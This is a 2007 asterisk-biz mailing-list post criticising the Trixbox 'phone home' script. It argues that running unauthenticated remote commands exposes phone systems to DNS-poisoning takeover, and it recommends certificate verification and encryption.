On Mon, 2007-12-17 at 17:23 +0100, randulo wrote: > Hi, > > Kerry Garrison from Fonality will be with us live to address the > Trixbox so-called "phone home" script issue.
The fact that they gather information with a unique cookie set at install time is not the bigger issue in my opinion. The fact that they run commands issued from remote without any verification that the commands came from them (ie use a certificate of some type to verify identity) is a bigger issue since it lets anyone with enough skill to dns poison to execute commands on your trixbox. This not only opens the potential for a zombie box doing nasty stuff but also opens your phone system to others who may just abuse it for free calls, may decide to record and relay those recordings elsewhere, may ... Self signed certificates are cheap - they are free. It does not take much to verify the fingerprint of that certificate to ensure that someone didnt do any of the nasties that could be done. It also sets it up to be an encrypted connection to avoid MiTM attacks of other types since it is just plaintext commands that are being executed. Btw since this has caused confusion in the past, I have never now nor at any time in the past had any affiliation with trixbox, I had the moniker trixter before they called themselves trixbox. -- Trixter http://www.0xdecafbad.com Bret McDanel Belfast +44 28 9099 6461 US +1 516 687 5200 http://www.trxtel.com the phone company that pays you! _______________________________________________ --Bandwidth and Colocation Provided by http://www.api-digital.com-- asterisk-biz mailing list To UNSUBSCRIBE or update options visit: http://lists.digium.com/mailman/listinfo/asterisk-biz
